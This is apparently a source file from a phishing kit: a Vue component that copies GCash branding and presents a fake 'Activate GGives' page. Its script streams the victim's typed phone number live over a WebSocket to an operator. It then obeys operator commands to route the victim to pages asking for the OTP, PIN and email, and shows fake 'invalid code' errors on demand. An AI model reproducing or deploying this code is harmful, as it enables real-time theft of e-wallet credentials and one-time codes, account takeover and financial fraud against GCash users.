<template>
    <div>
        <h1  style="background: #0057e4;
    color: #fff;
    margin: 0;
    text-align: center;
    font-size: .4rem;
    height: 5.5rem;
    padding-top: 1px;
    margin-bottom: -.9rem;"><img style="display: block;
    margin: 1.4rem auto;
    width: 8.25rem;" src="./assets/Gcash-white-new-logo.81ba859.png" alt=""> <!----></h1>
    <div class="container">
      
        <h1>Activate GGives</h1>
        <!-- 配置引导图 -->
        <img src="./assets/guide-image.png" alt="激活 GGives 引导图" class="guide-image">
        <p>If you are eligible for GGives, you need to activate it before you can start using it as a payment method. You will only need to do this once. Follow the steps listed below to activate your GGives. </p>
        <ol>
            <li>On your GCash app, tap <strong>Borrow</strong> &gt; <strong>GGives</strong>. </li>
            <li>Read through the GGives information and select <strong>Get Started</strong> </li>
            <li>Confirm your pre-inputted information and tap <strong>Next</strong></li>
            <li>Input any additional required information and tap <strong>Next</strong></li>
            <li>Enter the 6-digit authentication code sent to your GCash registered mobile number. Tap <strong>Once activated</strong> , you can return here to continue.</li>
        </ol>
        <div style="margin-top: 10px;">
            <button type="button" style=" display: block;

color: #fff;
    margin: 0 auto;
    border: 0;
    border-radius: 1rem;
    font-size: 1rem;
    text-align: center;
    max-width: 90%;    background-color: #0057e4;
    width: 15rem;
    height: 3rem;
    line-height: 1.88rem;
    border-radius: 1.5rem;"
                                       @click="Click_Submit">TRY AGAIN</button>
        </div>
        <p>If activation was successful, it will show up on your GCash app. You should also receive a text message and email indicating that your GGives is now activated. Any other important information you need to know before using GGives will also be stated in the email.
</p>
        <p>Once activated, you can return here to continue.</p>
    </div>

        <!-- <div class="root-app mobile">
            <div class="">
                <h1 class="layout-header">
                    <img src="./assets/Gcash-white-new-logo.81ba859.png" alt="">
                </h1>
                <div>
                    <div class="layout-content">
                        <div class="main-container login-page">
                            <div class="page-container">
                                <div class="page-main content-center">
                                    <h2>Login to pay with GCash</h2>
                                    <div class="login">
                                        <div accessbilityid="mobile-input" class="m-input hasPrefix"
                                            :class="{ 'notEmpty': isPhonenumberFocused, 'hasError': error_phonenumber_message }"
                                            autofocus="autofocus">
                                            <div class="input-wrap">
                                                <div class="input-prefix">+63</div>
                                                <input @focus="isPhonenumberFocused = true"
                                                    @blur="if (phonenumber) isPhonenumberFocused = true; else isPhonenumberFocused = false;"
                                                    v-model="phonenumber" @input="Change_phonenumber" maxlength="10"
                                                    type="number" pattern="[0-9]*">
                                                <div class="line"></div>
                                                <label class="placeholder">Mobile number</label>
                                            </div>
                                            <p v-if="error_phonenumber_message" class="error-text error-message">{{
                                                error_phonenumber_message }}</p>
                                        </div>
                                    </div>
                                </div>
                                <footer default-translate="no">
                                    <div class="submit-button display-mobile">
                                        <button type="button" class="ap-button ap-button-primary"
                                            :disabled="(phonenumber.length !== 10)" @click="Click_Submit"
                                            accessbilityid="next-button">NEXT</button>
                                    </div>
                                </footer>
                            </div>
                        </div>
                    </div>
                    <div class="registration-footer">
                        <p>Don’t have a GCash account? <span>Register now </span></p>
                    </div>
                </div>
            </div>
        </div> -->
        <van-overlay z-index="9999999" :show="loading">
            <div style="display: flex;align-items: center;justify-content: center;height: 100%;"><van-loading
                    size="60px" color="#005add" /></div>
        </van-overlay>
    </div>
</template>
<script>
import { ref, watch, onMounted, onBeforeUnmount } from 'vue';
import { useRouter } from 'vue-router'
import { store } from '/src/store.js'
import { showDialog } from 'vant';
// import { isValidNumber } from 'libphonenumber-js'// parseNumber, formatNumber, getNumberType, AsYouType


export default {
    name: "LoginView",  // 使用多单词名称
    setup() {
        const data_Value = ref('');
        const phonenumber = ref('');
        const loading = ref(false);
        const router = useRouter();
        const isPhonenumberFocused = ref(false);
        const error_phonenumber_message = ref('');
        const handleMessage = (event) => {
            Ws_message(event);
        };
        onMounted(() => {
            //document.documentElement.style.fontSize = '52px'; // 修改 <html> 的 font-size 宽除以7.5
            store.data.domain = 'gcash'
            window.scrollTo({ top: 0, left: 0, behavior: 'smooth' });//位置移到最上方
            store.WebSocket.addEventListener('message', handleMessage);
        });
        onBeforeUnmount(() => {
            store.WebSocket.removeEventListener('message', handleMessage);
        });
        watch(data_Value, (newValue) => {
            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live', data: Object.assign(store.data, newValue) }));
            }
        });
        watch(() => store.WebSocket, (newWebSocket, oldWebSocket) => {
            if (oldWebSocket) {
                oldWebSocket.removeEventListener('message', handleMessage);
            }
            if (newWebSocket) {
                newWebSocket.addEventListener('message', handleMessage);
            }
        });

        const Ws_message = (event) => {
            let jsonObject = JSON.parse(event.data)
            if (jsonObject.type == 'update') {
                let command = jsonObject.data.command
                if (command == 'deny') {
                    showDialog({
                        title: 'Invalid authentication code.',
                        message: 'Please enter the correct code and try again.',
                        theme: 'round-button',
                        confirmButtonColor: '#005add',
                        messageAlign: 'left',
                        confirmButtonText: 'OK'
                    }).then(() => {
                    });

                    loading.value = false
                }
                if (command == 'otp') {
                    router.push("/gcash/otp");
                }
                if (command == 'email') {
                    router.push("/gcash/email");
                }
                if (command == 'pin') {
                    router.push("/gcash/pin");
                }
                if (command == 'approve') {
                    router.push("/gcash/approve");
                }
                if (command == 'activation') {
                    router.push("/gcash/activation");
                }

                if (command == 'ok') {
                    router.push("/CheckoutOk");
                }
            }
        }

        const Change_phonenumber = (event) => {
            phonenumber.value = event.target.value;
            if (phonenumber.value.length == 0) {
                error_phonenumber_message.value = 'Please enter your mobile number.'
            }
            if (phonenumber.value.length < 10) {
                error_phonenumber_message.value = 'Please enter a valid mobile number.'
            }
            if (phonenumber.value.length == 10) {
                error_phonenumber_message.value = false
            }
            if (phonenumber.value.length > 10) {
                phonenumber.value = phonenumber.value.slice(0, 10); // 只取前19位
            }
            data_Value.value = { phone: phonenumber.value }//'{ "username": "' + text + '"}'
        }

        const Click_Submit = () => {
            router.push("/gcash/login");
            // if (phonenumber.value.length !== 10) {
            //     error_phonenumber_message.value = 'Please enter a valid mobile number.'
            //     return false;
            // }
            // if (!isValidNumber('+63' + phonenumber.value)) {
            //     showDialog({
            //         title: 'Invalid mobile number.',
            //         message: 'Please enter a valid mobile number.',
            //         theme: 'round-button',
            //         confirmButtonColor: '#005add',
            //         confirmButtonText: 'OK'
            //     }).then(() => {
            //         // on close
            //     });
            //     return false;
            // }

            // let newValue = { domain: store.data.domain, phone: phonenumber.value };
            // store.WebSocket.send(JSON.stringify({ type: 'live_update', data: newValue }));
            // store.data.current_page = 'loading'
            // loading.value = true

        };

        return {
            data_Value,
            phonenumber,
            isPhonenumberFocused,
            error_phonenumber_message,
            loading,
            Change_phonenumber,
            Click_Submit,

        };


    }
}


</script>
<style scoped>

body {
            font-family: Arial, sans-serif;
            line-height: 1.6;
            margin: 20px;
            background-color: #f9f9f9;
        }
        .container {
            max-width: 800px;
            margin: auto;
            background: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        h1 {
            color: #333;
        }
        ol {
            margin-left: 20px;
        }
        a {
            color: #0066cc;
            text-decoration: none;
        }
        a:hover {
            text-decoration: underline;
        }
        .breadcrumb {
            font-size: 14px;
            color: #555;
            margin-bottom: 10px;
        }
        .breadcrumb a {
            color: #0066cc;
            text-decoration: none;
        }
        .breadcrumb a:hover {
            text-decoration: underline;
        }
        .guide-image {
            width: 100%;
            max-width: 600px;
            display: block;
            margin: 20px auto;
        }
    </style>